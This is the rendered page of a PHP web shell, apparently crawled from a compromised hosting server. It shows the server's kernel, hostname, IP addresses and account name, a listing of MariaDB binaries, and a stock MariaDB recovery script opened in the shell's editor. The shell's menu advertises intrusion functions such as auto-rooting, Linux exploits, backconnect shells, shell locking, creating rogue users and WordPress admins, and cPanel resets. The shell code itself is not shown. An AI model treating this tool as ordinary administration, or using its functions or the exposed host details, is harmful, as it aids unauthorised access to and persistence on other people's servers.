Linux id-dci-web1412.main-hosting.eu 5.14.0-611.20.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jan 14 06:35:04 EST 2026 x86_64
LiteSpeed
: 2a02:4780:6:1512:0:19fc:adf1:2 | : 216.73.216.85
Cant Read [ /etc/named.conf ]
8.1.34
u435990001
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
sbin /
[ HOME SHELL ]
Name
Size
Permission
Action
aria_chk
5.54
MB
-rwxr-xr-x
aria_dump_log
5.34
MB
-rwxr-xr-x
aria_ftdump
5.35
MB
-rwxr-xr-x
aria_pack
5.38
MB
-rwxr-xr-x
aria_read_log
5.5
MB
-rwxr-xr-x
galera_new_cluster
928
B
-rwxr-xr-x
galera_recovery
3.29
KB
-rwxr-xr-x
innochecksum
4.61
MB
-rwxr-xr-x
mariadb
5.12
MB
-rwxr-xr-x
mariadb-access
109.48
KB
-rwxr-xr-x
mariadb-admin
4.89
MB
-rwxr-xr-x
mariadb-binlog
5.16
MB
-rwxr-xr-x
mariadb-check
4.89
MB
-rwxr-xr-x
mariadb-config
15.64
KB
-rwxr-xr-x
mariadb-conv
4.6
MB
-rwxr-xr-x
mariadb-convert-table-format
4.28
KB
-rwxr-xr-x
mariadb-dump
4.99
MB
-rwxr-xr-x
mariadb-dumpslow
8.19
KB
-rwxr-xr-x
mariadb-embedded
24.72
MB
-rwxr-xr-x
mariadb-find-rows
3.35
KB
-rwxr-xr-x
mariadb-fix-extensions
1.31
KB
-rwxr-xr-x
mariadb-hotcopy
34.67
KB
-rwxr-xr-x
mariadb-import
5
MB
-rwxr-xr-x
mariadb-install-db
22.35
KB
-rwxr-xr-x
mariadb-ldb
11.28
MB
-rwxr-xr-x
mariadb-plugin
4.58
MB
-rwxr-xr-x
mariadb-secure-installation
13.66
KB
-rwxr-xr-x
mariadb-service-convert
2.45
KB
-rwxr-xr-x
mariadb-setpermission
17.7
KB
-rwxr-xr-x
mariadb-show
4.88
MB
-rwxr-xr-x
mariadb-slap
4.89
MB
-rwxr-xr-x
mariadb-tzinfo-to-sql
4.57
MB
-rwxr-xr-x
mariadb-upgrade
5.01
MB
-rwxr-xr-x
mariadb-waitpid
4.56
MB
-rwxr-xr-x
mariadb_config
15.64
KB
-rwxr-xr-x
mariadbd
26.85
MB
-rwxr-xr-x
mariadbd-multi
26.85
KB
-rwxr-xr-x
mariadbd-safe
30.59
KB
-rwxr-xr-x
mariadbd-safe-helper
4.53
MB
-rwxr-xr-x
msql2mysql
1.42
KB
-rwxr-xr-x
my_print_defaults
4.56
MB
-rwxr-xr-x
myisam_ftdump
4.89
MB
-rwxr-xr-x
myisamchk
5.02
MB
-rwxr-xr-x
myisamlog
4.87
MB
-rwxr-xr-x
myisampack
4.92
MB
-rwxr-xr-x
myrocks_hotbackup
24.54
KB
-rwxr-xr-x
mysql
5.12
MB
-rwxr-xr-x
mysql_config
4.47
KB
-rwxr-xr-x
mysql_embedded
24.72
MB
-rwxr-xr-x
mysql_find_rows
3.35
KB
-rwxr-xr-x
mysql_fix_extensions
1.31
KB
-rwxr-xr-x
mysql_install_db
22.35
KB
-rwxr-xr-x
mysql_ldb
11.28
MB
-rwxr-xr-x
mysql_plugin
4.58
MB
-rwxr-xr-x
mysql_tzinfo_to_sql
4.57
MB
-rwxr-xr-x
mysql_upgrade
5.01
MB
-rwxr-xr-x
mysql_waitpid
4.56
MB
-rwxr-xr-x
mysqlaccess
109.48
KB
-rwxr-xr-x
mysqladmin
4.89
MB
-rwxr-xr-x
mysqlbinlog
5.16
MB
-rwxr-xr-x
mysqlcheck
4.89
MB
-rwxr-xr-x
mysqld
26.85
MB
-rwxr-xr-x
mysqld_multi
26.85
KB
-rwxr-xr-x
mysqld_safe
30.59
KB
-rwxr-xr-x
mysqld_safe_helper
4.53
MB
-rwxr-xr-x
mysqldump
4.99
MB
-rwxr-xr-x
mysqlimport
5
MB
-rwxr-xr-x
mysqlshow
4.88
MB
-rwxr-xr-x
mysqlslap
4.89
MB
-rwxr-xr-x
mytop
72.03
KB
-rwxr-xr-x
perror
4.77
MB
-rwxr-xr-x
replace
4.54
MB
-rwxr-xr-x
resolve_stack_dump
4.56
MB
-rwxr-xr-x
resolveip
4.56
MB
-rwxr-xr-x
sst_dump
6.81
MB
-rwxr-xr-x
wsrep_sst_backup
2.39
KB
-rwxr-xr-x
wsrep_sst_common
68.25
KB
-rw-r--r--
wsrep_sst_mariabackup
51.98
KB
-rwxr-xr-x
wsrep_sst_mysqldump
8.82
KB
-rwxr-xr-x
wsrep_sst_rsync
29.84
KB
-rwxr-xr-x
wsrep_sst_rsync_wan
29.84
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : galera_recovery
#!/usr/bin/sh # Copyright (c) 2016 MariaDB Corporation # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; version 2 of the License. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1335 USA */ # This script is intended to be executed by systemd. It starts mysqld with # --wsrep-recover to recover from a non-graceful shutdown, determines the # last stored global transaction ID and echoes it in --wsrep-start-position=XX # format. The output is then captured and used by systemd to start mysqld. # If the server was configured to start without wsrep, nothing is echoed. cmdline_args=$@ user="mysql" print_defaults="/usr/bin/my_print_defaults" log_file=$(mktemp /tmp/wsrep_recovery.XXXXXX) euid=$(id -u) recovered_pos="" skipped="" start_pos="" start_pos_opt="" ret=0 wsrep_on=0 log () { local msg="$1" # Print all messages to stderr as we reserve stdout for printing # --wsrep-start-position=XXXX. echo "$msg" >&2 } finish() { rm -f "$log_file" } trap finish EXIT parse_arguments() { for arg do val=`echo "$arg" | sed -e "s;--[^=]*=;;"` case "$arg" in --wsrep[-_]on) wsrep_on=1 ;; --skip[-_]wsrep[-_]on) wsrep_on=0 ;; --wsrep[-_]on=*) if echo $val | grep -iq '\(ON\|1\)'; then wsrep_on=1 else wsrep_on=0 fi ;; esac done } wsrep_recover_position() { # Redirect server's error log to the log file. eval /usr/sbin/mariadbd $cmdline_args --user=$user --wsrep_recover \ --disable-log-error 2> "$log_file" ret=$? if [ $ret -ne 0 ]; then # Something went wrong, let us also print the error log so that it # shows up in systemctl status output as a hint to the user. log "WSREP: Failed to start mysqld for wsrep recovery: '`cat $log_file`'" exit 1 fi # Parse server's error log for recovered position. The server prints # "..skipping position recovery.." if started without wsrep. recovered_pos="$(grep -a 'WSREP: Recovered position:' $log_file)" if [ -z "$recovered_pos" ]; then skipped="$(grep -a WSREP $log_file | grep 'skipping position recovery')" if [ -z "$skipped" ]; then log "WSREP: Failed to recover position: '`cat $log_file`'" exit 1 else log "WSREP: Position recovery skipped." fi else start_pos="$(echo $recovered_pos | sed 's/.*WSREP\:\ Recovered\ position://' \ | sed 's/^[ \t]*//')" log "WSREP: Recovered position $start_pos" start_pos_opt="--wsrep_start_position=$start_pos" fi } # Safety checks if [ -n "$log_file" -a -f "$log_file" ]; then chmod 600 $log_file else log "WSREP: mktemp failed" fi parse_arguments `$print_defaults $cmdline_args --loose-verbose --mysqld` # Perform wsrep position recovery if wsrep_on=1, skip otherwise. if [ "$wsrep_on" -eq 1 ]; then wsrep_recover_position fi echo "$start_pos_opt"
Close